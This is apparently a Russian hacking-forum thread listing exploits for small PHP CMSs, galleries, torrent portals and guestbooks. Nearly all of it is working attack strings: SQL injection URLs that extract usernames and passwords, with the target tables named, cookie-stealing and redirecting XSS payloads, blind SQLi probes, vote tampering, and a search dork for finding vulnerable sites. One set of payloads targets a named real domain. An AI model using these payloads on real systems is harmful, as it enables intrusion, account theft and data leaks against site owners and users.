![]() |
iPHPortal 1.37_02
Пасивная XSS Код:
http://site/user/?back_url=/" [xss code]Код:
http://site/forums/?action=forum_add_message&forum_id[]=Код:
http://site/admin/index.php?admin_url=rubric_edit.php?rubric_id=173+union+select+1,2,3,concat_ws(0x3a,user_login,user_password)+from+user+limit+0,1/* |
PHPSlideshow
XSS: Код:
http://site/slideshow/index.php?directory=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3EКод:
http://site/slideshow/index.php?directory=%3Cscript%3Edocument.location%3D%27http://forum.antichat.rua%27%3C/script%3E |
Уязвимости T-Xore [торрент портал]
Уязвимости T-Xore [торрент портал] Project : T-Xore (http://bit-torrent.net.ru/7-skript-torrent-indeksatora-giganova.org.html) Found by: Dimi4 Date : 03.02.09 Auth bypass login.php PHP код:
Password: anything Sql-inj usertorrent.php PHP код:
Код:
usertorrent.php?usuario=giga'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,aes_decrypt(aes_encrypt(concat_ws(0x3a,username,password),0x71),0x71),14,15,16,17,18,19,20,21,22+from+users/* |
GeekLog
Автор: faza02
Сайт производителя: geeklog.net GeekLog v1.3.7sr1 sql-inj: Код:
/filemgmt/singlefile.php?lid=-133+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16/*пассы хэшированы в md5. таблицы юзеров: gl_user колонки: username, passwd |
Автор: [JavaScript]
Сайт производителя: geeklog.net Респекты: faza02 за показание двига. Версии выше GeekLog v1.3.7sr1 Passive XSS: Код:
/filemgmt/singlefile.php?lid="><script>alert(/xss/)</script><!-- |
Профессиональная Open Source CMS
Сайт производителя: www.4site.ru SQL injection в модуле portfolio: Код:
http://4site.ru/portfolio/index.shtml?s=5&i=-26+union+select+1,2,3,version(),5,6,7,8,9--Код:
http://4site.ru/portfolio/index.shtml?s=-12+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13--Код:
http://4site.ru/faq/index.shtml?th=-5+union+select+1,2,version(),4,5----------------------------------------------------- The End! |
Lito Lite CMS (cate.php cid) Remote SQL Injection Exploit Код:
#!/usr/bin/perl -w |
Max Write System Автор: mailbrush Оффсайт: http://www.webwisesage.com/maxwrite/ Тип уязвимости: SQL Injection Код:
http://www.site.com/maxwrite/diarypage.php?did=-1+{SQL Injection}Код:
allinurl: diarypage.php?did= |
Wallist v1.2 - скрипт фотогаллереи
Уязвимость нашел: Kraneg SQL-Inj: 1. при просмотре галереи в файле files/view.inc отсутствует фильтрация или вообще что то похожее на защиту от скули =( Уязвимый код: PHP код:
Код:
http://localhost/wallist/?action=ShowGallery&pc=-1+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4--Уязвимый код: PHP код:
Голосуем за какую ни будь фотографию и далее выполняем запрос Код:
http://localhost/wallist/vote.php?action=vote&rating=12&id=[ID]+and+ASCII(lower(substring(version(),1,1)))=53--Код:
http://localhost/wallist/vote.php??action=vote&rating=12&id=5+and+ASCII(lower(substring(version(),1,1)))=53--Там же к примеру никто не ограничивает нас в выставлении балов картинке, то есть максимальные 12 балов вовсе не максимальные =). К примеру выполним: Код:
http://localhost/wallist/vote.php?action=vote&rating=4000000&id=43. Опять скуль =) Уязвимость находится в файле view_large.inc приводить код не буду почти везде он однотипный.. =\ Пример использования: Код:
http://localhost/wallist/?action=ShowGalleryFile&id=-4+UNION+SELECT+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8--1.Активная xss в коментариях, не фильтруется поле name(files/addcom.inc)... Уязвимый код: PHP код:
Уязвимый код: Код HTML:
<b>Спасибо что проголосовали за данную фотографию!</b></font><font color='#0071FB' size=-1><br>Код:
http://localhost/wallist/vote.php?action=vote&rating=<script>alert()</script>&id=[ID]Вобщем думаю это не все, просто это все, на что хватило меня =) стандартный префикс db_ таблица с пользователями user_name и user_password(в открытом виде) админа к сожалению там нет... он собственно в файле config.php =) так же скрипт за собой не то что не удаляет, даже не просит удалить папку install со всеми вытекающими... =\ |
Гостевая книга.
код: http://dump.ru/file/1946627 1. SQL inj бажный код: PHP код:
exploit: Код:
http://localhost/forum/forum.php?cmd=show&id=-6+union+select+group_concat(concat_ws(0x3a,id,msg,ans,author,topic,date,host,email,url))+from+forum--2. Активная XSS. Ну здесь уязвимы все поля... вл любом из них вводим Код:
"><script>alert(0x646f63756d656e742e636f6f6b6965)</script>Сильно не пинайте, знаю, что гостевая - один сплошной баг, но всеже решил опубликовать... ------------------------------------------------------------ The End! |
| Время: 21:25 |